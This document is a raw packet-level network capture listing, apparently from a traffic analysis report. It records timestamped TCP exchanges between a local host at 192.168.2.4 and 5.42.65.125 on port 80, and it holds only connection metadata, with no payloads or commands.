Dec 27, 2023 18:12:24.562566996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.562606096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.562783957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.562827110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.562846899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.562891006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.562911987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.562925100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.562936068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.562953949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.562964916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.562999010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.564251900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.564265013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.564275980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.564287901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.564300060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.564311028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.564328909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.564352036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.564373016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.564395905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.564415932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.564430952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.564739943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.564769983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.564783096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.564800024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.564812899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.564845085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.565692902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.565706015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.565749884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.565771103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.565814972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.566688061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.566715956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.566746950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.566756964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.566814899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.566859007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.567845106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.567856073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.567888975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.567900896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.567934990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.569134951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.569147110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.569178104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.569231033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.569281101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.569736958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.569782019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.569787979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.569840908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.569906950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.569952011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.570350885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.570363998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.570401907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.570415974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.570496082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.570545912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.571588993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.571619034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.571630955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.571631908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.571659088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.571682930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.572453022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.572465897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.572508097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.572545052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.572586060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.573029041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.573041916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.573084116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.573206902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.573252916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.574026108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.574040890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.574079990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.574093103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.574430943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.574484110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.576471090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.576483965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.576508999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.576535940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.576575994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.576617002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.576680899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.576693058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.576705933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.576733112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.576750994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.577231884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.577248096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.577260017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.577286005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.577313900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.580286980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.580300093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.580368996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.580389977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.580429077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.580564976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.580593109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.580604076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.580614090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.580642939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.581427097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.581439018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.581468105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.581495047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.581634998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.582312107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.582344055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.582353115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.582376003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.582746983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.583251953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.583288908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.583292961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.583292961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.583441973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.583453894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.583574057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.584260941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.584299088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.584315062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.584350109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.584460020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.584494114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.584913015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.584953070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.585000038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.585011959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.585035086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.585050106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.585678101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.585774899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.585812092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.586561918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.586575031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.586596966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.586625099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.586711884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.586824894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.587493896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.587532043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.587626934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.587645054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.587662935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.587677002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.588460922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.588500023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.588502884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.588536024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.588835955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.588869095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.588890076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.588924885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.589051962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.589092016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.589164972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.589200020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.589961052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.590054035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.590086937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.590095997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.590135098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.590619087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.590656996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.590677023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.590689898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.590715885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.590725899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.592688084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.592700958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.592730999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.592766047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.592803001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.595762968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.595777035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.595829964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.595880985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.595937967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.596679926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.596693039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.596734047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.596741915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.596820116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.596832037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.596872091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.596874952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.596910954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.597260952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.597301006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.597306967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.597312927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.597337008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.597347975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.597847939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.597860098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.597872019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.597883940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.597896099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.597899914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.597939014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.598480940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.598493099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.598521948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.598548889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.598552942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.598597050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.598609924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.598634005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.598659992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.598669052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.598826885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.599786997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.599798918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.599836111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.599869967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.599914074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.600081921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.600095034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.600126982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.600143909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.600356102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.600398064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.600713968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.600759029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.600820065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.600862980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.600883007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.600924015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.601551056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.601562977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.601597071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.601797104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.601839066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.602188110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.602200985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.602230072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.602349043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.602390051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.604650974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.604692936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.604696035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.604715109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.604751110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.604767084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.607248068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.607259989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.607309103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.607564926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.607575893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.607590914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.607603073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.607634068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.607666969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.607724905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.608232975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.608280897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.608406067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.608417988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.608453989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.614468098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.614530087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.614654064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.614701033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.614783049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.614794970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.614806890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.614820004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.614830971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.614830971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.614842892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.614855051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.614861012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.614886999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.615747929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.615760088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.615771055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.615788937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.615808964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.615822077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.615833998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.615854979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.615869999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.615894079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.616480112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.616492033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.616520882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.616523027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.616533041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.616555929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.616570950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.616583109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.616594076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.616610050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.616631031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.619395018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.619406939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.619425058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.619442940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.619471073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.625540972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.625554085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.625591040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.625653982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.625665903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.625698090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.625971079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.625993967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.626013041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.626044989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.630466938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.630510092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.630515099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.630522013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.630532980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.630546093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.630553961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.630587101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.630608082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.630651951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.631380081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.631392956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.631402969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.631414890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.631426096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.631428003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.631460905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.631690979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.631704092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.631731987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.631756067 CET	80	49738	5.42.65.125	192.168.2.4
